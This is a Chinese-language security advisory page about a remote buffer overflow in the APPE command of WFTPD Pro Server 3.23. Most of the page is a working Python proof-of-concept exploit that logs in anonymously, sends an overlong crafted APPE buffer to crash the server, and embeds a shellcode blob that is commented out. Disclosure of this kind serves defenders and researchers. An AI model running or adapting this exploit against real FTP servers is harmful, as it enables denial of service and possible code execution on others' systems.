 |
WFTPD Pro Server APPE命令缓冲区溢出漏洞 |
|
|
| WFTPD Pro Server APPE命令缓冲区溢出漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:16:09 |
|
2006-11-8 19:27:17
发布日期:2006-11-07
更新日期:2006-11-08
受影响系统:Texas Imperial Software WFTPD Pro 3.23 描述:
BUGTRAQ ID: 20942
WFTPD Pro Server是一款FTP服务程序。
WFTPD Pro在处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
如果向WFTPD Pro Server发送超长畸形的包含有斜线或/和反斜线的APPE命令的话,就会触发缓冲区溢出,导致执行任意指令。
<*来源:Joxean Koret (joxeankoret@yahoo.es)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=116289234522958&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! #!/usr/bin/env python
import sys
import struct
import ftplib
print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)"
print "Copyright (c) Joxean Koret"
print
target = "192.168.1.13"
targetPort = "21"
try:
ftp = ftplib.FTP()
print "[+] Connecting to target "
msg = ftp.connect(target, targetPort)
print "[+] Ok. Target banner"
print msg
print
print "[+] Trying to logging anonymously"
msg = ftp.login() # Anonymous
print "[+] Ok. Message"
print msg
print
except:
print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
sys.exit(0)
a = "\\\\A:"
for i in range(6):
a += a
print "[+] Padding length " + str(len(a)) + " bytes"
b = "ABCD"
for i in range(4):
b += b
a = a + "ABCD"*10 + b
shellCode = ""
shellCode += "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
shellCode += "\x9b\x26\x8c\x83\xeb\xfc\xe2\xf4\x10\xf1\xcd\xc1\x04\x62\xd9\x73"
shellCode += "\x13\xfb\xad\xe0\xc8\xbf\xad\xc9\xd0\x10\x5a\x89\x94\x9a\xc9\x07"
shellCode += "\xa3\x83\xad\xd3\xcc\x9a\xcd\xc5\x67\xaf\xad\x8d\x02\xaa\xe6\x15"
shellCode += "\x40\x1f\xe6\xf8\xeb\x5a\xec\x81\xed\x59\xcd\x78\xd7\xcf\x02\xa4"
shellCode += "\x99\x7e\xad\xd3\xc8\x9a\xcd\xea\x67\x97\x6d\x07\xb3\x87\x27\x67"
shellCode += "\xef\xb7\xad\x05\x80\xbf\x3a\xed\x2f\xaa\xfd\xe8\x67\xd8\x16\x07"
shellCode += "\xac\x97\xad\xfc\xf0\x36\xad\xcc\xe4\xc5\x4e\x02\xa2\x95\xca\xdc"
shellCode += "\x13\x4d\x40\xdf\x8a\xf3\x15\xbe\x84\xec\x55\xbe\xb3\xcf\xd9\x5c"
shellCode += "\x84\x50\xcb\x70\xd7\xcb\xd9\x5a\xb3\x12\xc3\xea\x6d\x76\x2e\x8e"
shellCode += "\xb9\xf1\x24\x73\x3c\xf3\xff\x85\x19\x36\x71\x73\x3a\xc8\x75\xdf"
shellCode += "\xbf\xc8\x65\xdf\xaf\xc8\xd9\x5c\x8a\xf3\x37\xd0\x8a\xc8\xaf\x6d"
shellCode += "\x79\xf3\x82\x96\x9c\x5c\x71\x73\x3a\xf1\x36\xdd\xb9\x64\xf6\xe4"
shellCode += "\x48\x36\x08\x65\xbb\x64\xf0\xdf\xb9\x64\xf6\xe4\x09\xd2\xa0\xc5"
shellCode += "\xbb\x64\xf0\xdc\xb8\xcf\x73\x73\x3c\x08\x4e\x6b\x95\x5d\x5f\xdb"
shellCode += "\x13\x4d\x73\x73\x3c\xfd\x4c\xe8\x8a\xf3\x45\xe1\x65\x7e\x4c\xdc"
shellCode += "\xb5\xb2\xea\x05\x0b\xf1\x62\x05\x0e\xaa\xe6\x7f\x46\x65\x64\xa1"
shellCode += "\x12\xd9\x0a\x1f\x61\xe1\x1e\x27\x47\x30\x4e\xfe\x12\x28\x30\x73"
shellCode += "\x99\xdf\xd9\x5a\xb7\xcc\x74\xdd\xbd\xca\x4c\x8d\xbd\xca\x73\xdd"
shellCode += "\x13\x4b\x4e\x21\x35\x9e\xe8\xdf\x13\x4d\x4c\x73\x13\xac\xd9\x5c"
shellCode += "\x67\xcc\xda\x0f\x28\xff\xd9\x5a\xbe\x64\xf6\xe4\x1c\x11\x22\xd3"
shellCode += "\xbf\x64\xf0\x73\x3c\x9b\x26\x8c"
a = a + "JOXEAN" #+ shellCode
print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "
try:
msg = ftp.sendcmd("APPE " + a)
print "[!] Exploit doesn't work [" + msg + "]"
except:
print "[+] Exploit apparently works. Trying to verify it ... "
try:
ftp.connect(target, targetPort)
print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
except:
print "[!] Ok. Server is dead, exploit successfully executed. "
建议:
厂商补丁:
Texas Imperial Software
-----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.wftpd.com/
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: OpenLDAP服务器Bind请求拒绝服务漏洞
下一篇新闻: FreeBSD UFS文件系统本地整数溢出漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
